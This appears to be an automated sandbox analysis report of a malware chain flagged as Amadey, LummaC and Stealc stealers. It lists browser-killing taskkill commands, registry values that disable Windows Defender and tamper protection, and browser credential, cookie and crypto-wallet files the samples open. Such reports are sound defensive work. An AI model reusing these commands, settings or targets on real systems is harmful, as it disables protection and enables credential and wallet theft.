Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Code function: 0_2_04FC029B rdtsc 0_2_04FC029B
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: e2af9f55fd.exe PID: 3684, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Memory allocated: C:\Windows\SysWOW64\taskkill.exe base: 27F0000 protect: page read and write
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Memory written: C:\Windows\SysWOW64\taskkill.exe base: 27F0000
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Memory written: C:\Windows\SysWOW64\taskkill.exe base: 298F2D8
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Memory written: C:\Windows\SysWOW64\taskkill.exe base: 29901E8
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe "C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe "C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe "C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe "C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: d146970153.exe, 0000000C.00000002.2347191221.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000003.00000002.1532394072.00000000005EC000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: e2af9f55fd.exe, e2af9f55fd.exe, 0000000A.00000002.2253762327.0000000000E78000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: \Program Manager
Source: firefox.exe, 00000019.00000002.2437589344.000000D5EAC7B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: f20b4c0961.exe, f20b4c0961.exe, 00000009.00000003.2272289947.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2272672432.000000000118A000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2294281840.0000000001176000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2272465396.0000000001185000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2476887903.00000000006E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2fQ8fpTWAP.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1443898887.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1532319346.00000000003F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1985177506.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1523091105.00000000003F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1482818635.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1484037273.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1492066593.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000038.00000003.2755283804.0000000001236000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d146970153.exe PID: 7652, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3848, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000A.00000003.2212530060.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2702954448.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2408464145.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2253374920.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2416102733.000000000174B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2706190538.0000000001442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2356073494.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2612937099.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e2af9f55fd.exe PID: 3684, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: f20b4c0961.exe, 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: f20b4c0961.exe, 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: f20b4c0961.exe, 00000009.00000003.2246243440.000000000118C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: f20b4c0961.exe, 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: f20b4c0961.exe, 00000009.00000003.2163858876.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "t":0,"p":"%appdata%\\Exodus\\exodus
Source: f20b4c0961.exe, 00000009.00000003.2246243440.000000000118C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
Source: f20b4c0961.exe, 0000000B.00000003.2321917430.0000000000704000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
Source: f20b4c0961.exe, 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: f20b4c0961.exe, 00000009.00000003.2246243440.000000000118C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: f20b4c0961.exe, 00000009.00000003.2246243440.000000000118C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: f20b4c0961.exe, 0000000B.00000003.2321730162.00000000006FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
